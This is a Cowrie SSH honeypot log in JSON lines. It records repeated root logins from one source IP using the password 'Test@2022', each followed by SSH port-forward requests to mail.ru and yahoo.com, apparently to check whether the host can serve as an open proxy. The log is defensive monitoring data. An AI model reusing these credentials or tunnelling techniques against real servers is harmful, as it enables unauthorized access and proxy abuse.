{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.703426Z","src_ip":"77.83.207.83","session":"620238ece9c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.955891Z","src_ip":"77.83.207.83","session":"620238ece9c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10095,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10095","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.007399Z","session":"620238ece9c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.057873Z","src_ip":"77.83.207.83","session":"620238ece9c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":15446,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15446","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.200837Z","session":"620238ece9c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.251391Z","src_ip":"77.83.207.83","session":"620238ece9c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":4170,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4170","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.393196Z","session":"620238ece9c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.443914Z","src_ip":"77.83.207.83","session":"620238ece9c7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.495229Z","src_ip":"77.83.207.83","session":"620238ece9c7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61167,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ed7b13b5ce9","protocol":"ssh","message":"New connection: 77.83.207.83:61167 (1.2.3.4:22) [session: 2ed7b13b5ce9]","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.543564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.544180Z","src_ip":"77.83.207.83","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.594107Z","src_ip":"77.83.207.83","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.841157Z","src_ip":"77.83.207.83","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2752,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2752","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.891661Z","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:24.941421Z","src_ip":"77.83.207.83","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":19315,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:19315","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.083875Z","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.134028Z","src_ip":"77.83.207.83","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":28958,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28958","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.276071Z","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.325777Z","src_ip":"77.83.207.83","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.376754Z","src_ip":"77.83.207.83","session":"2ed7b13b5ce9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61256,"dst_ip":"1.2.3.4","dst_port":22,"session":"c29a587f2724","protocol":"ssh","message":"New connection: 77.83.207.83:61256 (1.2.3.4:22) [session: c29a587f2724]","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.427549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.437456Z","src_ip":"77.83.207.83","session":"c29a587f2724"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.479363Z","src_ip":"77.83.207.83","session":"c29a587f2724"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.735107Z","src_ip":"77.83.207.83","session":"c29a587f2724"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15163,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15163","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.787565Z","session":"c29a587f2724"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.838912Z","src_ip":"77.83.207.83","session":"c29a587f2724"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":1653,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1653","sensor":"my-vps","timestamp":"2025-08-31T03:47:25.981501Z","session":"c29a587f2724"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.032633Z","src_ip":"77.83.207.83","session":"c29a587f2724"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":25072,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25072","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.177464Z","session":"c29a587f2724"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.228665Z","src_ip":"77.83.207.83","session":"c29a587f2724"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.280606Z","src_ip":"77.83.207.83","session":"c29a587f2724"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61327,"dst_ip":"1.2.3.4","dst_port":22,"session":"6353f45eb4b9","protocol":"ssh","message":"New connection: 77.83.207.83:61327 (1.2.3.4:22) [session: 6353f45eb4b9]","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.329814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.330812Z","src_ip":"77.83.207.83","session":"6353f45eb4b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.381388Z","src_ip":"77.83.207.83","session":"6353f45eb4b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.637658Z","src_ip":"77.83.207.83","session":"6353f45eb4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11159,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11159","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.689463Z","session":"6353f45eb4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.740404Z","src_ip":"77.83.207.83","session":"6353f45eb4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":21516,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21516","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.885179Z","session":"6353f45eb4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:26.936007Z","src_ip":"77.83.207.83","session":"6353f45eb4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":12020,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12020","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.081217Z","session":"6353f45eb4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.132094Z","src_ip":"77.83.207.83","session":"6353f45eb4b9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.183516Z","src_ip":"77.83.207.83","session":"6353f45eb4b9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61418,"dst_ip":"1.2.3.4","dst_port":22,"session":"977b11b6bc7b","protocol":"ssh","message":"New connection: 77.83.207.83:61418 (1.2.3.4:22) [session: 977b11b6bc7b]","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.233270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.234369Z","src_ip":"77.83.207.83","session":"977b11b6bc7b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.285502Z","src_ip":"77.83.207.83","session":"977b11b6bc7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.535932Z","src_ip":"77.83.207.83","session":"977b11b6bc7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6829,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6829","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.587563Z","session":"977b11b6bc7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.637793Z","src_ip":"77.83.207.83","session":"977b11b6bc7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25267,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25267","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.780579Z","session":"977b11b6bc7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.830895Z","src_ip":"77.83.207.83","session":"977b11b6bc7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":6725,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6725","sensor":"my-vps","timestamp":"2025-08-31T03:47:27.972596Z","session":"977b11b6bc7b"}
